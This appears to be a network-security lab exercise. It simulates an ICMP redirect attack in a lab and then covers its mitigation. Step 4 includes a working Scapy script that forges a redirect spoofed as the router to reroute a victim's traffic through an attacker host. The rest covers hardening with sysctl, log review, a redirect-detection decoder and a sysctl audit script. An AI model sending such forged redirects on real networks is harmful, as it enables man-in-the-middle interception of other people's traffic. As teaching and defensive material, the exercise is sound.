Exercise 25: Analyzing ICMP Redirects

Jan 25, 2025

Objective

Understand how ICMP Redirects affect network traffic by simulating and analyzing their impact. Learn mitigation techniques to secure devices against malicious routing manipulation.

Scenario

As a cybersecurity professional, you are tasked with understanding how ICMP Redirects can be used to manipulate network traffic and how to secure critical devices against this threat. In this exercise, you will simulate ICMP redirects using Scapy, analyze the changes in the routing table of a victim machine, and explore mitigation strategies.

⚠️ Important: This exercise should be performed in a legal and controlled lab environment. Unauthorized network manipulation is illegal and unethical.


Lab Instructions

Step 1: Set Up the Test Network

  • Router (R1): Acts as the default gateway.
  • Victim Machine (V1): The machine whose routing will be manipulated.
  • Attacker Machine (A1): Sends ICMP redirect packets to V1.

Network Setup Example:

  • Router (R1): 192.168.1.1
  • Victim (V1): 192.168.1.100
  • Attacker (A1): 192.168.1.200

Step 2: Install Required Tools

On the Attacker Machine (A1), install Scapy:

sudo apt update
sudo apt install python3-scapy -y

Step 3: Verify the Victim’s Routing Table

On Victim Machine (V1), check the routing table:

ip route

The default gateway should be 192.168.1.1.

Step 4: Send ICMP Redirect Packet

On Attacker Machine (A1), create and send an ICMP redirect packet using Scapy:

from scapy.all import *

victim_ip = "192.168.1.100"
router_ip = "192.168.1.1"
attacker_ip = "192.168.1.200"

# Craft ICMP Redirect Packet
pkt = IP(src=router_ip, dst=victim_ip) / ICMP(type=5, code=1, gw=attacker_ip) / IP(src=victim_ip, dst="8.8.8.8") / ICMP()

# Send Packet
send(pkt)

Explanation: The packet is sourced from the router’s address, so the victim treats it as a legitimate redirect from its current gateway. It tells the victim to send traffic for 8.8.8.8 via the attacker’s IP (192.168.1.200) instead of the router (192.168.1.1).

Step 5: Analyze the Victim’s Routing Table

On Victim Machine (V1), check the updated routing table:

ip route

Expected Result: A new route appears, redirecting traffic through the attacker’s IP (192.168.1.200).

Step 6: Test the Impact

On Victim Machine (V1), attempt to ping an external server:

ping 8.8.8.8

The traffic may now be routed through the attacker’s machine.

Step 7: Mitigation – Disable ICMP Redirects

On Victim Machine (V1) and critical devices, disable ICMP redirects:

sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
sudo sysctl -w net.ipv4.conf.default.accept_redirects=0

Make it permanent:

echo "net.ipv4.conf.all.accept_redirects = 0" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.conf.default.accept_redirects = 0" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p

Step 8: Verify Mitigation

  • Attempt to send another ICMP redirect from the attacker machine.
  • Verify that the victim’s routing table remains unchanged.

Solution & Explanation

How ICMP Redirects Work

  • ICMP Redirects are used by routers to inform hosts of a more efficient route for a specific destination.
  • An attacker can forge these packets to reroute traffic through a malicious device, enabling Man-in-the-Middle (MitM) attacks.

Impact of ICMP Redirects

  • Traffic Interception: Allows attackers to monitor or alter traffic.
  • Denial of Service (DoS): Redirects traffic to a non-existent or malicious destination.

Mitigation Strategies

  1. Disable ICMP Redirects: Prevents devices from accepting route changes.
  2. Use Secure Routing Protocols: Implement protocols like OSPF with authentication.
  3. Network Segmentation: Isolate sensitive devices from public networks.
  4. Monitor for ICMP Anomalies: Use IDS/IPS to detect malicious ICMP traffic.

Testing & Verification

  • Confirm that the victim’s routing table was altered after the attack.
  • Verify that disabling ICMP redirects prevents further manipulation.
  • Monitor network traffic for unauthorized ICMP activity.
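The "Monitor for ICMP Anomalies" strategy and the "Monitor network traffic for unauthorized ICMP activity" check above can be made concrete. The following is an added example and not code from the original exercise: a pure-Python decoder for ICMP redirect messages (no Scapy required) plus a defender-side policy check that flags a redirect whose sender or new gateway is not a trusted router, whose new gateway is off-link, whose quoted datagram targets an on-link destination, or whose quoted datagram was not sent by the redirected host. It constructs its own test packets with struct, shaped like the lab’s Scapy packet; the second trusted router 192.168.1.2 and the destination 10.0.0.5 are assumptions added for contrast and do not appear in the lab setup.

```python
"""ICMP redirect decoder and policy check (added example; pure Python, no Scapy needed)."""
import ipaddress
import struct

IPPROTO_ICMP = 1
ICMP_REDIRECT = 5          # ICMP type 5 = Redirect (RFC 792)
ICMP_ECHO = 8
REDIRECT_CODES = {0: "network", 1: "host", 2: "tos-and-network", 3: "tos-and-host"}


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    """Minimal IPv4 header (no options) with a valid header checksum, followed by payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + payload


def build_redirect(claimed_src: str, victim: str, new_gw: str, orig_dst: str, code: int = 1) -> bytes:
    """Constructed test packet shaped like the lab's Scapy packet: a redirect that quotes an echo
    request from the victim to orig_dst (IP header + first 8 bytes, as RFC 792 requires)."""
    echo = struct.pack("!BBHHH", ICMP_ECHO, 0, 0, 1, 1)
    echo = echo[:2] + struct.pack("!H", checksum(echo)) + echo[4:]
    quoted = build_ipv4(victim, orig_dst, IPPROTO_ICMP, echo)[:28]
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, code, 0, ipaddress.IPv4Address(new_gw).packed) + quoted
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    return build_ipv4(claimed_src, victim, IPPROTO_ICMP, icmp)


def parse_ipv4(buf: bytes):
    """Return (src, dst, proto, header_len); raise ValueError on a malformed header."""
    if len(buf) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, _tlen, _id, _frag, _ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", buf[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(buf) < ihl:
        raise ValueError("malformed IPv4 header")
    return str(ipaddress.IPv4Address(src)), str(ipaddress.IPv4Address(dst)), proto, ihl


def parse_redirect(pkt: bytes):
    """Decode an IPv4 packet; return a dict for an ICMP redirect, None for anything else."""
    src, dst, proto, ihl = parse_ipv4(pkt)
    if proto != IPPROTO_ICMP:
        return None
    icmp = pkt[ihl:]
    if len(icmp) < 8 or icmp[0] != ICMP_REDIRECT:
        return None
    if checksum(icmp) != 0:            # a correct checksum verifies to zero
        raise ValueError("bad ICMP checksum")
    _type, code, _csum, gw = struct.unpack("!BBH4s", icmp[:8])
    orig_src, orig_dst, _, _ = parse_ipv4(icmp[8:])   # the quoted datagram that "triggered" the redirect
    return {"from": src, "to": dst, "code": REDIRECT_CODES.get(code, "unknown"),
            "new_gw": str(ipaddress.IPv4Address(gw)), "orig_src": orig_src, "orig_dst": orig_dst}


def assess_redirect(info: dict, trusted_routers: set, lan: str) -> list:
    """Defender-side policy: return the reasons a redirect is suspect (empty list = plausible)."""
    net = ipaddress.IPv4Network(lan)
    reasons = []
    if info["from"] not in trusted_routers:
        reasons.append(f"sender {info['from']} is not a trusted router")
    if info["new_gw"] not in trusted_routers:
        reasons.append(f"new gateway {info['new_gw']} is not a trusted router")
    if ipaddress.IPv4Address(info["new_gw"]) not in net:
        reasons.append(f"new gateway {info['new_gw']} is off-link")
    if ipaddress.IPv4Address(info["orig_dst"]) in net:
        reasons.append(f"redirect for on-link destination {info['orig_dst']} needs no gateway")
    if info["to"] != info["orig_src"]:
        reasons.append("quoted datagram was not sent by the redirected host")
    return reasons


def demo() -> dict:
    """Constructed scenario: the lab's forged redirect (source spoofed as R1, new gateway = A1)
    next to a plausible one that points at an assumed second router R2 = 192.168.1.2."""
    trusted = {"192.168.1.1", "192.168.1.2"}
    packets = {
        "forged": build_redirect("192.168.1.1", "192.168.1.100", "192.168.1.200", "8.8.8.8"),
        "plausible": build_redirect("192.168.1.1", "192.168.1.100", "192.168.1.2", "10.0.0.5"),
    }
    return {name: assess_redirect(parse_redirect(pkt), trusted, "192.168.1.0/24")
            for name, pkt in packets.items()}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {reasons or 'no policy violation'}")
```

Because the lab’s packet spoofs the router’s address, the sender check alone would pass it; the finding comes from the new gateway (192.168.1.200) not being in the trusted-router set, which is why an allow-list of legitimate routers is the core of this detection. On a real sensor the bytes would come from a raw socket or a pcap reader instead of build_redirect.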

Check ICMP Settings:

sudo sysctl net.ipv4.conf.all.accept_redirects
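The sysctl check above reads only the conf/all value, which is not the whole story on Linux. The following added example (not part of the original exercise) parses a `sysctl -a`-style snapshot and computes the value the kernel actually applies per interface, following the rule in the kernel’s ip-sysctl documentation: when forwarding is off on an interface, conf/all and conf/<interface> are OR-ed (AND-ed when forwarding is on). A host that ran only the two commands in Step 7 therefore still accepts redirects on eth0 while net.ipv4.conf.eth0.accept_redirects is 1, because the "default" entry only seeds interfaces created afterwards. The two snapshots are constructed and eth0 is an assumed interface name.

```python
"""Audit of the sysctls behind Step 7 (added example, not from the original exercise)."""
import re

BASE = "net.ipv4.conf."


def parse_sysctl(text: str) -> dict:
    """Parse `sysctl -a`-style 'key = value' lines; numeric values become ints."""
    conf = {}
    for line in text.splitlines():
        m = re.match(r"\s*([\w./-]+)\s*=\s*(.*?)\s*$", line)
        if m:
            key, val = m.groups()
            conf[key] = int(val) if val.lstrip("-").isdigit() else val
    return conf


def interfaces(conf: dict) -> list:
    """Real interface names under net.ipv4.conf.<iface>. ('all' and 'default' are pseudo-entries)."""
    names = {m.group(1) for m in (re.match(r"net\.ipv4\.conf\.([^.]+)\.", k) for k in conf) if m}
    return sorted(names - {"all", "default"})


def effective(conf: dict, iface: str, key: str, combine: str) -> bool:
    """Combine conf/all and conf/<iface> the way the kernel does ('or' or 'and')."""
    all_v = bool(conf.get(f"{BASE}all.{key}", 0))
    if_v = bool(conf.get(f"{BASE}{iface}.{key}", 0))
    return (all_v and if_v) if combine == "and" else (all_v or if_v)


def accepts_redirects(conf: dict, iface: str) -> bool:
    """Rule from the kernel's ip-sysctl documentation: with forwarding off on the interface the
    two values are OR-ed, with forwarding on they are AND-ed. So on a host (forwarding off),
    clearing only conf/all leaves redirects accepted while conf/<iface> is still 1."""
    forwarding = bool(conf.get(f"{BASE}{iface}.forwarding", conf.get(f"{BASE}all.forwarding", 0)))
    return effective(conf, iface, "accept_redirects", "and" if forwarding else "or")


def audit(conf: dict) -> list:
    """Return findings; an empty list means the host matches the lab's hardening goal."""
    findings = []
    for scope in ("all", "default"):
        if conf.get(f"{BASE}{scope}.accept_redirects", 1):
            findings.append(f"{scope}.accept_redirects is not 0")
    for iface in interfaces(conf):
        if iface == "lo":
            continue
        if accepts_redirects(conf, iface):
            findings.append(f"{iface}: redirects are still accepted; set {BASE}{iface}.accept_redirects=0 too")
        # The kernel logs a rejected redirect ("Redirect from ... ignored") only when log_martians is on.
        if not effective(conf, iface, "log_martians", "or"):
            findings.append(f"{iface}: rejected redirects will not be logged (log_martians=0)")
    return findings


# Constructed snapshot: the two `sysctl -w` commands from Step 7 have been run on a host
# (forwarding off) whose eth0 still carries the kernel's host default accept_redirects=1.
SAMPLE_AFTER_STEP7 = """\
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.forwarding = 0
net.ipv4.conf.all.log_martians = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 1
net.ipv4.conf.eth0.forwarding = 0
net.ipv4.conf.eth0.log_martians = 0
net.ipv4.conf.lo.accept_redirects = 1
"""

# Constructed snapshot after the per-interface key was cleared and martian logging enabled.
SAMPLE_HARDENED = SAMPLE_AFTER_STEP7.replace("eth0.accept_redirects = 1", "eth0.accept_redirects = 0") \
                                    .replace("eth0.log_martians = 0", "eth0.log_martians = 1")

if __name__ == "__main__":
    for label, snap in (("after step 7", SAMPLE_AFTER_STEP7), ("hardened", SAMPLE_HARDENED)):
        print(label, "->", audit(parse_sysctl(snap)) or "OK")
```

To audit a real host, feed the output of `sysctl -a` to parse_sysctl. For the Step 8 verification, note that current kernels store an accepted redirect as a per-destination route exception rather than as an entry in the main table, so `ip route get 8.8.8.8`, which shows such an exception with a `redirected` cache flag, is the more reliable way to see whether a redirect took effect.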

Analyze Logs:

Review system logs for suspicious ICMP packets:

sudo dmesg | grep ICMP
sudo tail -f /var/log/syslog

Additional Script (Optional)

Automate the disabling of ICMP redirects:

#!/bin/bash
# Disable ICMP Redirects
sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
sudo sysctl -w net.ipv4.conf.default.accept_redirects=0
sudo sysctl -p

echo "ICMP redirects have been disabled."

Run the script:

chmod +x disable_icmp_redirects.sh
sudo ./disable_icmp_redirects.sh

Conclusion

In this exercise, you simulated an ICMP Redirect Attack using Scapy to manipulate the victim’s routing table. You verified the attack’s impact and implemented mitigation strategies by disabling ICMP redirects. Understanding and securing routing protocols is critical to defending against such network manipulation attacks.
